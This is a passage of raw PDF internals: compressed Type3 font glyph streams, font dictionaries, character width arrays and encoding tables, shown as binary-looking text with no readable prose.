JN%}¤½Ö<=“Dt2l¥IÜ©yÑÑ&ôFš:Uï; ôAš9ÉOŠ} ô5*¡¿­ºÿÄÿ‰°­ ÄœŒE'"'íEÑ<´¾¦®_g'µ¸ßÑÆ©Ñ +endstream +endobj +1352 0 obj << +/Length 279 +/Filter /FlateDecode +>> +stream +xÚ]ÑAJÄ0àC»…МÀ¦Ç.„Â8‚]ãÊ…êÒ…¢ëöÁ«ô&æuW°ôù’<3‹ôãÑ¿ù».OËÊXSÒZ[svnž +ýªIkÂè_<¾èM£ó;šu~žÍyûxÖùfwi +oÍ}aìƒn¶¦E„'8p…@ë@Òµ1Ù±=™Ž h¨ $«3,ØÄ+N¼€ÝŠ­‚moƒµÛ³.˜ }0ý颿Q…£’x(`ÜO‡b<¾£âkˆç|ŽÑ4ºPS0á€%»â€ +¢–ƒöàØÞW¾œÌÈCeàË  »ä›PIÂ{Á7™½]øоiՈݱúªÑ·úR}Ý +endstream +endobj +1353 0 obj << +/Length 231 +/Filter /FlateDecode +>> +stream +xÚÍαJAàYÈÁL›"y÷.p1©b¯L•BAS¦P´Î=’p²2EÈ8»n@ô,†ofgÙ§“ËÉŒK®´¦×WüRÑ+ÕsË8ÆÅó– ¹5×sr·zJ®¹ã÷· ¹Åý5Wä–ü 7©Y²È ð~k%…öÒvìT²Z^{ÓcÝÙ³ ÷ÃâôU«o²CÕ0Ë–*¤ÅSTB¶‹ú`ζÑñÞ&‡í%‹ãE¶Ÿ´§QÒÈ0›b4è3¾Ýe}÷¿Íÿô"Ý_馡}Èl® +endstream +endobj +1354 0 obj << +/Length 204 +/Filter /FlateDecode +>> +stream +xÚmÌ; +Â@à . ´Vf. ›´1àL!he!Vji¡(X›£å({„”Á8ë£—åø‡ùÝéÅQ—Úš’˜º}Úi<"ÏÈŃ÷f{ÀQ†jÅ{T3ŽQes:Ÿ.{T£Å˜4ª ­5EÌ&¡€º6äü¥…°%/_x÷/PAP02gøýÁ0Ò¦–yp&îî¬dBw›:Œ+0ðÁüâ}¨AT¾yóMÞ6Ó¢5lö–¢.Ë5²Ài†K|¤øT£ +endstream +endobj +1355 0 obj << +/Length 198 +/Filter /FlateDecode +>> +stream +xÚ31Ó34V0P0RÐ5T01V0µPH1ä*ä21PASKˆLr.—“'—~¸‚‰—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEùÃT‚D0S$ê00|`ÇÀü¹A¾ù;ÿæ ì˜ÿå˜00þ* àÄ?8Q"êI&êPMÊøbÛ½`Ëßœq ä ã ò Ìê˜þÿ:]þ—«'W ÈckA +endstream +endobj +1356 0 obj << +/Length 182 +/Filter /FlateDecode +>> +stream +xÚÎA +‚`à'?( ‘œ ”ýüºÌ A­ZD«jXÔ.Ì£yàÒ…Tcu€ßæ 7f: +5ÙðP³™° ø éL¦ %¿—ý‰â”ü MþBbòÓ%_/·#ùñjÆ’&¼•ÎŽÒ„¡ZÀ{ÈUe5ÈTÆ©¬Ö-Õ‡W¨6êÀj@-ÐÉÅóOù¯Ó‰;*`{ú^‰ž[bàTd7“ý +w§”§ÍSZÓ»= +endstream +endobj +1357 0 obj << +/Length 198 +/Filter /FlateDecode +>> +stream +xÚ31Ó34V0P0VÐ5T01Q0µPH1ä*ä21PASKˆLr.—“'—~¸‚‰—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEÿó‚ÁþT‚zó !ÿHÔ±÷`øÁøþó†ú쀶¤ „|P±=˜i«‡u âÉDª)öph‘<„ÚkrF=ÈAï?0þ`<ÿŸ¡†½ÿ?ƒü?þÿ ì@‡s¹zrroXhI +endstream +endobj +1358 0 obj << +/Length 189 +/Filter /FlateDecode +>> +stream +xÚ]Î1 +Â@Ð\˜B/ 8ÐM²(ÚЦ´²+µT´“èÑr”!åbI +qáÁ23ü;èö9änÀ¶ÏvÈû€ÎdC)úlGUgw¤IBfÍ6$3—2™dÁ×Ëí@f²œr@&æm)‰Ú¸·2Ï©\^¡sϵ2¸Î÷¯HÅøQ‰RñþQÖOþø—Ö5ÉQÑJrµìhè M£íÂá„TårL¼@³„Vô½£@ +endstream +endobj +1359 0 obj << +/Length 141 +/Filter /FlateDecode +>> +stream +xÚ32Õ36W0P0bcSK…C®B.# ÌI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢*c¹<]ê˜ÿ70ð|À ßþ€ÁžÿCÿ`ÆÌ00ŠÿÿÿÇäè§3ÿa`¨ÿÿ޹\=¹¹¢&[ +endstream +endobj +1360 0 obj << +/Length 237 +/Filter /FlateDecode +>> +stream +xÚ¿J1Æ¿00…ñ v^@³9ïäŠÃ…ó·´²+µT´[¸}´> +stream +xÚ31Ó34V0P0bS …C®B.C ßÄI$çr9yré‡+˜ré{E¹ô=}JŠJS¹ôœ€¢. +Ñ@-±\ž. +Ì€à?É&™iN‚ìaþ`ÿD~°’È700nà?ÀÀüDþ“ØÀÈä‡$Ù€‚ëÿÿƒÿÿ7 “\®ž\\y +endstream +endobj +1362 0 obj << +/Length 122 +/Filter /FlateDecode +>> +stream +xÚ32Ö30W0P0aCS3…C®B.C ßÄI$çr9yré‡+Zpé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜ø0È@A@ 8~Àüá? ±q©ŽØ0üÿ‚¸\=¹¹(CE` +endstream +endobj +1363 0 obj << +/Length 150 +/Filter /FlateDecode +>> +stream +xÚ32Õ36W0PÐ5QÐ54W0´P05SH1ä*ä22 +(˜Ãä’s¹œ<¹ôÃŒ ¹ô=€\úž¾ +%E¥©\úNÎ +@Q…h ®X.OÆ ìø   P?`üÁð†Ø€¸ôE6Œ?êügüðŸ‚üc?PÃ~À†Ÿÿó.WO®@.ÿ§Wõ +endstream +endobj +1364 0 obj << +/Length 196 +/Filter /FlateDecode +>> +stream +xÚµÍ1 +Â@Еir3'p.#˜BÐÊB¬ÔRPQ°ÍÑr±0EÈ:? êdÙ³3ó7èuÂ.{Œô¸òʧãH‰ÆrCqJzÆGz$¯¤Ó1öÇ5éx2`ŸtÂsŸ½¥ […RÊüâë?´LõºæÝ3Ø‚ærÁÊkm‚¨„;xÔÂ3êH†Kv¤Ø@%¯â.êýoÔ nn—**ŒÉù@Ô¦ôDr +endstream +endobj +1365 0 obj << +/Length 108 +/Filter /FlateDecode +>> +stream +xÚ32Ö30W0P0aCS …C®B.C ßÄI$çr9yré‡+Zpé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜?0ü‡!þ ̃±ÿ`øÿÿq¹zrrÆ‚Q. +endstream +endobj +1366 0 obj << +/Length 177 +/Filter /FlateDecode +>> +stream +xÚ3³Ô3R0Pa3scs…C®B.3 ßÄI$çr9yré‡+˜™pé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]˜?ð`Àðÿƒý†ú@úƒ=ãƒ:†ÿÈ77Ø3ðnà?Î ßÀüÿˆþÇÀDÿa`ÿÁÀNÿ``ÿ€þÀÀþ`Ð O€âÿÿƒÿÿ7ÿÿNs¹zrr#߈ +endstream +endobj +1367 0 obj << +/Length 147 +/Filter /FlateDecode +>> +stream +xÚ31Ó34V0P0bcs…C®B.C ßÄI$çr9yré‡+˜ré{E¹ô=}JŠJS¹ôœ€¢. +Ñ@-±\ž. +Ìø?00üÿ`ÿD~°’È70ðnà?ÀÀüDþ“ØÀÈä‡$Ù0½ñÿÿÁÿÿI.WO®@.‡e% +endstream +endobj +1368 0 obj << +/Length 188 +/Filter /FlateDecode +>> +stream +xÚŽ1‚@E¿¡ ™†#0Ðeƒ6 &na¢•…±RK v9Gá”Tâd)H¬ÌN^fþîþù‘žÌ¦ð”Çš£€Ã9Ÿ5Ý(ŒE”qÑßœ®”R{cRk‘I™ ?îÏ ©l»dM*çƒæàH&g8^W‰S­œQƒdHàVðá•R¾ ò!J*¨- +Ài~ nNû/†ooñkg»Íîõ$AéÖHåŠ> +éáwlzZÚÑIKÚ +endstream +endobj +1369 0 obj << +/Length 196 +/Filter /FlateDecode +>> +stream +xÚα +Â@ àH†B¡y½ž­uj;:9ˆ“::(ºÚ>Z¥p"ØŠç]qÐQ |CB’?Šû2ä€Ü“1G!‡#ÞI:R°«aøm”d$V$f¶O"›óùtÙ“H–$R^K6”¥ŒÊ¯À¨\ƒ¹UW0÷Â/¼º%>Á«°T¨5*è´4hy~“ÿÌ÷ö²¥ý¦Ýß> +stream +xÚ31Ö³0R0P0VÐ54S01Q06WH1ä*ä21PASc¨Tr.—“'—~¸‚‰—¾PœKßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEùÃùŒêØ0üa<|€ùÃãìÊð?`0?À€Áþ€> +stream +xÚ36Ò35R0PacCcs…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ØÈ3üPàÿÃÇþ?nÿÀÿœýó3 ~Äo˜0ÿah`þÁÀ€‚?P³Íüÿÿs¹zrrjÙF„ +endstream +endobj +1372 0 obj << +/Length 195 +/Filter /FlateDecode +>> +stream +xÚ=αJÄ@à¶X˜fßÀÌ x{›`TñSwÕ‡•Z +* +Wî£í£ÄÊ6`“"8Î%GŠ™ùÿfŠ|q~ÆK.ø4p¡ó‚½R^j¨çåÔ<> +stream +xÚ36Ò3²T0P0TÐ5T0²P05TH1ä*ä22 +(˜Ad’s¹œ<¹ôÌ̸ô=€Â\úž¾ +%E¥©\úNÎ +†\ú. +ц +±\ž. +  Ø W á Œ@Ì Äì@,ÿÿ?Ã(f„ÊQ „þ0‚pC sC3ƒ=;ÿ?°f.WO®@.uH– +endstream +endobj +1374 0 obj << +/Length 153 +/Filter /FlateDecode +>> +stream +xÚ31Ó34V0P0RÐ5T01Q06WH1ä*ä21 +([@d’s¹œ<¹ôÃL ¹ô=€Â\úž¾ +%E¥©\úNÎ +@Q…h žX.Oæ ìþ`üJò`À‘p’ƒºBþ`°ÀÀðƒ¡üÆçÿì™Iùÿí@’ùÐ.WO®@.1c +endstream +endobj +1375 0 obj << +/Length 183 +/Filter /FlateDecode +>> +stream +xÚU̱ +‚PÆñ#‘k[çêªWJ'Á rjjˆ ¨Æ†¢¶ˆûh>Š`›Ph—º—jù ÿ¾@ BŸ\ò©ïQà“ÒÎÃ#ŠHE—Äè³l˜dÈ—$"äS•‘g3:Ÿ.{äÉ|Lò”V¹kÌRj×_œ +œÒ.Á.X ,g0i)à <¡¥©¡pƒ¶&†®A†=éjœ|c(v‘kØ]þb=ÀÐ(Ô¿áúO¨ÁI† |F£?ê +endstream +endobj +1376 0 obj << +/Length 233 +/Filter /FlateDecode +>> +stream +xÚUÎ=KÃPÅñs Xx³v(æùzËíËb ­`A' +ÖQ|A7©‘|±€Ð~Lïx‡`¼7UÓN?8gù«áá°Ï!ñAÄjÀÝÏ"z$¥ìr·¿~nîh”¼d¥HžÚ™drÆÏO/·$GçcŽHNø*âðš’ WUPñ÷6¾Aß´4æðŠ5¹§q ‘þ" bxØ%âtÇq¿Á_ù®cùGˆÅ²h;²š÷L€ Ëtè5Â<þfúOk…2·|âµÁ+ñ–ZlECÝdÑ ±ï(°ç˜ÂÑIBô¥Y_™ +endstream +endobj +1377 0 obj << +/Length 210 +/Filter /FlateDecode +>> +stream +xÚMν +Â@ ð)(¡«ƒÐ> +stream +xÚUÎÁjÂ@àYi® +Î èn²Zõ$¨sÚSE¨GÁ½‰æÑöQ|„x ‰³²Iéå;üÃüü=ÝF¤(¢N8 ^DúÖ!þ qª¨¯ÝiµÅIŒò‹ôåœs”ñ‚ö¿‡ ÊÉÇ”B”3úI-1žQY¦ãâàAægà//7ˆœŽ4gËZŽvª*Ì 0‰Ã¿˜Š+ã]S‡¸CEÉ@QsüϰFÕì,IqSn/¼'¶’gCþbŸ^m‘mjg`ç1øã'>ÚŸKø +endstream +endobj +1379 0 obj << +/Length 183 +/Filter /FlateDecode +>> +stream +xÚ%Î1 +Â@„á‘@„‡$|'0‰+AA¢‚)­,D¨¥ ¢æQ<‚eŠ`œÅ_ìì·°&î# µÇL_M¬‡H.bìÚ£½ØŸ$I%ب‰$Xp• ]êíz?J¬¦Êu¦[>ÙI:ÓIU•uO§Ã)Fh~ðß!;£ó:còÌÛዬQÖ‘‚ôŸÿ)HÿåpIëH]R·YÀ#õH[¤mé(œ²âl2Oe-?uàC +endstream +endobj +1380 0 obj << +/Length 188 +/Filter /FlateDecode +>> +stream +xÚµ1 +Â@EH!L“#d. ›ÍºˆBŒ` +A+ ±RK EÁBb޶GÉR¦R×l´6¯˜˜ÿþPtÌ+îǬƬ5$Ii;ŒXÜf¢$#±a¥I,ì˜D¶äëåv$‘¬f,I¤¼•í(K~ |[äj¿„W¢‚opGÏà ÀÄ!´—S‹¢E¦ /‹òèzù´ÌO¾6x+Ó¸YÛ~åÕÎÜuдñí…æ­éÂÕ`ú +endstream +endobj +1381 0 obj << +/Length 121 +/Filter /FlateDecode +>> +stream +xÚ31Ô35R0P0bc3SS…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]0001;Ëñÿ ÿaX*6T°ý†úÿÿ?À0—«'W ¾NÚ +endstream +endobj +1382 0 obj << +/Length 228 +/Filter /FlateDecode +>> +stream +xÚmαJÄ@ÆñoÙ"0M^ป'p÷WóSZYˆ ¨¥ ¢`eòh>JáÊ+ŽŒóé5‚E~°;ÿY²¬šc­té_^iÓèC-/’³Ÿ+9¸’u'éZs–tî·’º }{}”´¾<ÕZÒFoj­n¥Û(Ê-€~‚Ù€8¶#J^ÎQì0CÜc…0áùîÈDÌ_úŸžÓÁïø:ßsöNüaçü™r$_΂[-> ³À,°ˆ, +%‡s„'äƒlÏ"³ÈÌñ¥™aAZÒ›M°¿ÈY'Wò TŸc| +endstream +endobj +1383 0 obj << +/Length 235 +/Filter /FlateDecode +>> +stream +xÚuÐ1NÄ0ЉRXšß`3', ZiY$R AE¨€ ´ØGóQr„”[¬0¼„‰"OÊŒóÇ“ãîÈ/¥•^—ÒŸ‰÷òØñ+÷ÅVüɾóðÌëÝ­ôžÝ%Êì†+yûxb·¾>—ŽÝFî:iïyØ™-­2È9QµµÕ EëPõE6‚f¤LÍôV»&‘ÆàðÌÔb&e6‚€§Ñf“õÕŽó‘òY (yâ/ifU ý°Å_ cBüÔ¨M>Õ‹ý‚¸Ÿ™°y¥ÿ€‚޵¸2_ |ÃßÇ›jh +endstream +endobj +1384 0 obj << +/Length 188 +/Filter /FlateDecode +>> +stream +xڕν +Â@ ð+ At-(˜'ð®¶µkotr¡P?ÁQðÅ_ÄÇè èý‹­³ù‘äIàõÃ+FŠÃ!¯=Ú“™º,ñ‘o)Ñ$ìG$'¦KROùt8oH&³{$S^z¬V¤SBĢ⊠+ ØÀ©iƒèA«äf°1ë€h‚.p;»Áö`¯Z  \2ðoóŠß›ÿÂy™³54Ö4§òý`ö +endstream +endobj +1385 0 obj << +/Length 226 +/Filter /FlateDecode +>> +stream +xÚ•Ï¿jAðïnaÜ ˆÎ ˜½s=b!j W¦J!‚`R +ìnÍG¹G°´8ÜÌœEH:›_1;ödÏyŸSp¯ÏnÈyΟíÉ9)¦œ¿Ü_6[šd?Ø9²oR&[Ìùð}ü";YL9#;ãeÆéŠŠÇÀŒÇæÒºÂ„ÐpQ*Å+j .+xsº7á”xÄ•‘Íç–Üð‘\ƒ }µrÓþ† ”¿ø´•R þ/:tK­¬uéîNTc¨'Û¼‰Ä'ò¡jìiT”2ƒ®D¥×‚Þé+XÑ +endstream +endobj +1386 0 obj << +/Length 243 +/Filter /FlateDecode +>> +stream +xÚm½JÄ@…OØ"p›¼ÁÎ}d³ƒÚXW0… •… j)¨hëäÑò(ó)S„ÏD…m>†{çüÜuuìVZj­G+­ÏÔ9}ªäMjÇa©îägóø"›VìÖNìÇbÛkýxÿ|»¹¹ÐJìVï+-¤Ý*Ðô@ P„sŽºø‚&¾³¾[ D>#E@ƒ¢Ç†r˜Iõ~2û> +stream +xڕα +Â@ àHÁB}Ѽ€Þ]õ¤“…ª`A'uª(¸ÙGóQî|ƒšTZèàà‘û†?$w#3°i²ÔhdÈŽéhð‚CË!Çá·s8cœ ÚÐТZpŒ*YÒíz?¡ŠWS2¨f´5¤w˜ÌHŸP˜Qžç®ÎëY’ 4aÐ:B@à ¸Ç8 ‚—1¾ìn +-¡SQ¼üRá-8­ð +d“_Ñ®Ó+ÈJ¢_<ÿ!’¯tùâ<Á5~lúQ- +endstream +endobj +1388 0 obj << +/Length 265 +/Filter /FlateDecode +>> +stream +xÚMÁJÃ@Eo˜ÅÀ[8мÐ$A„ÒB­`B]¹WêÒ…¢ÐEÁù´ù” ;#Ç›*ÖÍyóî{wæÎquÔLµÔZ§ZŸjÓè}%OR7KmN~&w²l¥¸Öº‘₲í¥¾<¿>H±\Ÿi%ÅJo*-o¥])L OÄ[ +À`;d1ëa¶°3X`LpÀM6{ä{xÖSÏœ˜°Hpžî|tO¥0£1l¹6Ì ùi4ÈþÓ,ìÀe3zŸÓáw™gRÒô¦SÅß@v伕+ùÿcå +endstream +endobj +1389 0 obj << +/Length 237 +/Filter /FlateDecode +>> +stream +xÚuÏ1NÄ0бRDšÆ@ò\œlÖBT––E"Tˆ +¶¤AKr®â›ì!eŠ3³ ˆšgiÿ_×'aE5t¼¢æŒB ÇŸ± 2¬(œÎ_žpÓ¢¿¥& ¿”1úöŠ^_Þvè7×çT£ßÒ]MÕ=¶[‚b—….'0SÉ2*(ÙŒ`&p ÞÁõBì!Ît ç¼àÒð_èÝ_èR¥c§Ø™%Éž 6{6Cñ!I¬cˆ“Ä)A×ô?€Ö«ÌÁ“ôXZ1IÁØËN+éOVë”ùÀäqY‰-Þàú m9 +endstream +endobj +404 0 obj << +/Type /Font +/Subtype /Type3 +/Name /F15 +/FontMatrix [0.01204 0 0 0.01204 0 0] +/FontBBox [ -4 -21 83 62 ] +/Resources << /ProcSet [ /PDF /ImageB ] >> +/FirstChar 21 +/LastChar 122 +/Widths 1390 0 R +/Encoding 1391 0 R +/CharProcs 1392 0 R +>> endobj +1390 0 obj +[41.52 0 0 0 0 0 48.44 46.13 46.13 69.2 0 0 0 0 0 0 0 0 23.07 32.29 32.29 0 0 23.07 27.68 23.07 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 41.52 23.07 23.07 0 0 0 0 0 62.28 58.82 59.97 63.43 56.51 54.2 65.16 62.28 29.99 0 64.58 51.9 76.12 62.28 64.58 56.51 64.58 61.12 46.13 59.97 62.28 62.28 85.34 62.28 62.28 0 0 0 0 0 0 0 41.52 46.13 36.91 46.13 36.91 25.37 41.52 46.13 23.07 25.37 43.82 23.07 69.2 46.13 41.52 46.13 43.82 32.52 32.75 32.29 46.13 43.82 59.97 43.82 43.82 36.91 ] +endobj +1391 0 obj << +/Type /Encoding +/Differences [21/a21 22/.notdef 27/a27/a28/a29/a30 31/.notdef 39/a39/a40/a41 42/.notdef 44/a44/a45/a46/a47/a48/a49/a50/a51/a52/a53/a54/a55/a56/a57/a58/a59 60/.notdef 65/a65/a66/a67/a68/a69/a70/a71/a72/a73 74/.notdef 75/a75/a76/a77/a78/a79/a80/a81/a82/a83/a84/a85/a86/a87/a88/a89 90/.notdef 97/a97/a98/a99/a100/a101/a102/a103/a104/a105/a106/a107/a108/a109/a110/a111/a112/a113/a114/a115/a116/a117/a118/a119/a120/a121/a122] +>> endobj +1392 0 obj << +/a21 1325 0 R +/a27 1327 0 R +/a28 1326 0 R +/a29 1328 0 R +/a30 1329 0 R +/a39 1318 0 R +/a40 1316 0 R +/a41 1317 0 R +/a44 1319 0 R +/a45 1324 0 R +/a46 1320 0 R +/a47 1321 0 R +/a48 1380 0 R +/a49 1381 0 R +/a50 1382 0 R +/a51 1383 0 R +/a52 1384 0 R +/a53 1385 0 R +/a54 1386 0 R +/a55 1387 0 R +/a56 1388 0 R +/a57 1389 0 R +/a58 1322 0 R +/a59 1323 0 R +/a65 1330 0 R +/a66 1331 0 R +/a67 1332 0 R +/a68 1333 0 R +/a69 1334 0 R +/a70 1335 0 R +/a71 1336 0 R +/a72 1337 0 R +/a73 1338 0 R +/a75 1339 0 R +/a76 1340 0 R +/a77 1341 0 R +/a78 1342 0 R +/a79 1343 0 R +/a80 1344 0 R +/a81 1345 0 R +/a82 1346 0 R +/a83 1347 0 R +/a84 1348 0 R +/a85 1349 0 R +/a86 1350 0 R +/a87 1351 0 R +/a88 1352 0 R +/a89 1353 0 R +/a97 1354 0 R +/a98 1355 0 R +/a99 1356 0 R +/a100 1357 0 R +/a101 1358 0 R +/a102 1359 0 R +/a103 1360 0 R +/a104 1361 0 R +/a105 1362 0 R +/a106 1363 0 R +/a107 1364 0 R +/a108 1365 0 R +/a109 1366 0 R +/a110 1367 0 R +/a111 1368 0 R +/a112 1369 0 R +/a113 1370 0 R +/a114 1371 0 R +/a115 1372 0 R +/a116 1373 0 R +/a117 1374 0 R +/a118 1375 0 R +/a119 1376 0 R +/a120 1377 0 R +/a121 1378 0 R +/a122 1379 0 R +>> endobj +1393 0 obj << /Length 120 /Filter /FlateDecode >> @@ -8573,7 +9254,7 @@ x @Q…h ¦X.O…ú˜ù@aƒ<2È3Ø¡Ö1Ô€á.WO®@.z½,8 endstream endobj -1255 0 obj << +1394 0 obj << /Length 288 /Filter /FlateDecode >> @@ -8582,7 +9263,7 @@ xڵѽJ ¹ÂÏgä;¥Õ)‹œšW$_­$¢4f¬ds5˜½ù¡Üå° endstream endobj -1256 0 obj << +1395 0 obj << /Length 307 /Filter /FlateDecode >> @@ -8593,7 +9274,7 @@ xÚ• ±ÿ„¨¤ÂѲ«^jlgˆª˜¢©è;9„„MhÇ»àÝ@ôlâÙ&±k«Ñk xÑá ~ZµÕÄ endstream endobj -1257 0 obj << +1396 0 obj << /Length 95 /Filter /FlateDecode >> @@ -8609,7 +9290,7 @@ x ÿŒDÈåêÉÈõéS endstream endobj -1258 0 obj << +1397 0 obj << /Length 257 /Filter /FlateDecode >> @@ -8618,7 +9299,7 @@ x ÆØGÆ¨í ²4€klñü@´ŸHIwÙm,Ï‚ÎÈeôŠ(€nD¿÷˜Ã'„_û™þ†Dô;ìð/ГF/ô <“ endstream endobj -1259 0 obj << +1398 0 obj << /Length 187 /Filter /FlateDecode >> @@ -8629,7 +9310,7 @@ Q RœÙ!/®™”‘¥¦¾ðü*’x½éx¦“ü…žñAö…ß_¢ƒX'út ÿä endstream endobj -1260 0 obj << +1399 0 obj << /Length 294 /Filter /FlateDecode >> @@ -8637,7 +9318,7 @@ stream xÚå’1N„P†‡lA2 G`. Üݬ[½d])L´²ØX¹–­áh K G ¤ ;μ¨Ä-­–>Âdþ7üÿœž')%”Îèh:¥ÅLïmŠ8_Êg)$‹¾x÷€« Í Í—h.´‚&»¤ç§—{4««3JѬi#r·˜­ ¢V\s¡ ™+eÌ\+sæVÉÌ;á›…ïÊøc'ÒüYCìDJE@khpªy£¯¶õŒ…µN r&„'¬ó|3X8˜yÏò7í>Vžñ?ÓŽ¹gžñÜùßÿŒüP~ú¦¬}¢ƒ¿ÎïÞŸ‡Ë…µÝç¹ü*°.Ï6òíóÖü_…M·n/¬F-Œº½™p·G¶òtסÏ3¼Æ/v¨R: endstream endobj -1261 0 obj << +1400 0 obj << /Length 289 /Filter /FlateDecode >> @@ -8645,7 +9326,7 @@ stream xÚåÒ¿NÃ0pG"ÝÒGȽ8¡”¦S¥R$2 ÁÄ€˜€‘³óhy?BÆQŽÏ¢”±11ý$'gŸïsuvZ”\pÅ'Ë%_T¼>çç’ÞhµÁjÁe±Žßž^iW“¾çÕ†ôµû@º¾á÷ÏÒ»ÛK.Iïù›=R½g¥”´ÊX¥29xs¼F¤‰ˆ´0…Ìà.`sé²n¥Iš¥»aÍ&Ò¹-a«PcSiÜQ'§b³!¸èar$Êњͻïn­ÓL¶A3·ùY™«þØæ÷~æ}÷™ß3ÜßLóˆóñs:šÛ8Ï,Îwšw˜?~‰yt>%(ô¹‰JCŽ6¹N9¹ÛøÆwßIßõºdïú?KW5ÝÑbÄ0Î endstream endobj -1262 0 obj << +1401 0 obj << /Length 174 /Filter /FlateDecode >> @@ -8654,7 +9335,7 @@ x Â@àI%Ì%2'p³ù!X 1‚[ZYˆ•ZZ(ZG±°ôÅÅ#¤Lg„‚'°ùàÍc^wÃdc! )ieq‹Q*9Ðøn–ÌšE)š‘œÑ¸1íw‡5šl2 ‹&§¹¥`.'ðj>‚¯‚ÇBGñ•¾R(ü>q|æøÂ|m„[­T½l‘-A¶å©¥Qêoª” Nñ]0ªù endstream endobj -1263 0 obj << +1402 0 obj << /Length 290 /Filter /FlateDecode >> @@ -8662,7 +9343,7 @@ stream xÚ•‘½NÃ@ Ç]e¨äåáüD%-L•J‘È€bF$@°!Ý=Z%1Âø# 0ÖÃýtöÙ翽®«3ªè„ŽjjNiÓÐc¯Ø¬ÄYÑf푇gܵXÞR³ÂòRÜX¶Wôþöñ„åîúœj,÷tWSuížw Æü-ç’Y¯Q0$6/«å…¡+K`Ë]`€‚sÐÜ”£ä@ÌqÐJy«Xäm¯åaBêE?‡ÕŒŽ/CdÃ$$°EImŽõ‘6ß›J»ª0ÍwµÁƒ…‹þ}|"úvVOEÏ>+Øûš†]:â8G8qª2¼xÍOGò©Ø”¸× î´ÕÀ™e9I¡fbEŠîT„é†%lKí}ÓùoL. /Z¼ÁZÎD endstream endobj -1264 0 obj << +1403 0 obj << /Length 186 /Filter /FlateDecode >> @@ -8672,7 +9353,7 @@ x A+ ±RK Eëx¯âMô–SHÖ_A°¶rŠù`^L»ÙˆÄâR©;iµ%OdéxÃY‚j,yúj-ÖÜ-ØN%KØQg[Œd·Ý¯ØvÇ=qlû2é9}ñ'"2úçWt¾Q~àß\ˆjO¯%Á•(ŠmPað¬ý Œä›Ñ¨Ñ\Œà`´æ}…_¨ô×ö‰xPð„ïbàùY endstream endobj -338 0 obj << +403 0 obj << /Type /Font /Subtype /Type3 /Name /F17 @@ -8681,47 +9362,81 @@ endobj /Resources << /ProcSet [ /PDF /ImageB ] >> /FirstChar 39 /LastChar 117 -/Widths 1265 0 R -/Encoding 1266 0 R -/CharProcs 1267 0 R +/Widths 1404 0 R +/Encoding 1405 0 R +/CharProcs 1406 0 R >> endobj -1265 0 obj +1404 0 obj [44.27 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 76.42 0 0 0 70.83 0 0 0 0 0 0 37.74 126.28 82.01 0 82.01 82.01 54.29 61.09 0 82.01 ] endobj -1266 0 obj << +1405 0 obj << /Type /Encoding /Differences [39/a39 40/.notdef 97/a97 98/.notdef 101/a101 102/.notdef 108/a108/a109/a110 111/.notdef 112/a112/a113/a114/a115 116/.notdef 117/a117] >> endobj -1267 0 obj << -/a39 1254 0 R -/a97 1255 0 R -/a101 1256 0 R -/a108 1257 0 R -/a109 1258 0 R -/a110 1259 0 R -/a112 1260 0 R -/a113 1261 0 R -/a114 1262 0 R -/a115 1263 0 R -/a117 1264 0 R +1406 0 obj << +/a39 1393 0 R +/a97 1394 0 R +/a101 1395 0 R +/a108 1396 0 R +/a109 1397 0 R +/a110 1398 0 R +/a112 1399 0 R +/a113 1400 0 R +/a114 1401 0 R +/a115 1402 0 R +/a117 1403 0 R >> endobj -1268 0 obj << -/Length1 773 -/Length2 667 +1407 0 obj << +/Length1 771 +/Length2 1151 /Length3 0 -/Length 1198 +/Length 1689 +/Filter /FlateDecode +>> +stream +xÚ­RkTבª¡¬òRIÕzX%róÔ + ˆ±h €<$f&dJ2C‡ $ âƒJª²,b£Kž¢¢TXU꥖X…[ÀiáËëEªVEÀ×°®®KÿÞ5η÷>ß·gŸæ%gˆ l,ÁP‚Áar„ T&“rØ€<³Ù-‡•‚¡aJŽ@àVëµ€»°ùBÞ +!O¡P,݈#©ø„Ò'E| ÒÁ8¢R¢@¦$4°Žì¡RjS!0ad‘V ÖOÞÈëá Ï„!&…â"À&8A)¬IORTþ;Ò§¿§2a<ƒ4|¦lÒiÂP­@°šÂZ‹‘Ó`ÒËÿÃÖôæ½V»V©›l?•Ôßx¥ÑÿT`ºt=ã@†A0ŽN—ÆÂïÌÉ`Ñ릳RB©ET"4U g%“½òŽdH E!„JÔJm<…Ã(4Ý ™ß”–<^¢ðýói§È(%‚ÑÆt°ÿROÕœ¿j2$1€6“ÍæBò{Jš6LŒª0AS—ç”8®4RÈ%"+0q‚B°ÀÒ1‹‰byÉä5†S&ßÕ X©“«F†Eï06`iጌ)àï¿‚LŒ\ÀàòÈQì•þ€ÏcçüP¥Çq%¦Ö‡ è}­FÈLaØ«(¶[˜*`ÛçûÏì¨ÉWuw¤g,´ÝÖ~aûiKs¸7ÀíÞøK4üÉ®Û]?GN¸”ŒD~ǂԼ>êQ¶Õ$gmïqµ:{Ð+Èg=R '&ϸRÖÖú‘îÐÎû¶Åƒé¾~õ~~/ó‚cÝš~%u¤pfÍí[¯Ÿæ¦mîè³9} y•P’ÊήÙ+þ}¯èÚÄÃp¬ +³U_™Ÿxà¹ûµõnwÚg‹À\&s¸i |5‡M7¨û;(œƒi‹mq¥‚Õráì…~7å`÷q —%.¨¹)Röûì.º`ÀËòa·4?§$"V3ºàx…›ªf60¼šj×·nhÑ¡— +ë×廥Õwr‹9éûhëSÆ_ÓþX²k泤—/{_¼5S[©L^vž'gÄúú Îôñ¦·³©Ž×¿²zÅ+5ßÜ'DÁ½N«Ìmº÷g7É@œàfžÇ­c_yÛ¸”ÂqÝþòÈ6ø~ßdÝ›(6Ø â/£ŸöW>þÏåóAn²$4¡7å\ômß+µ «ÂÜk 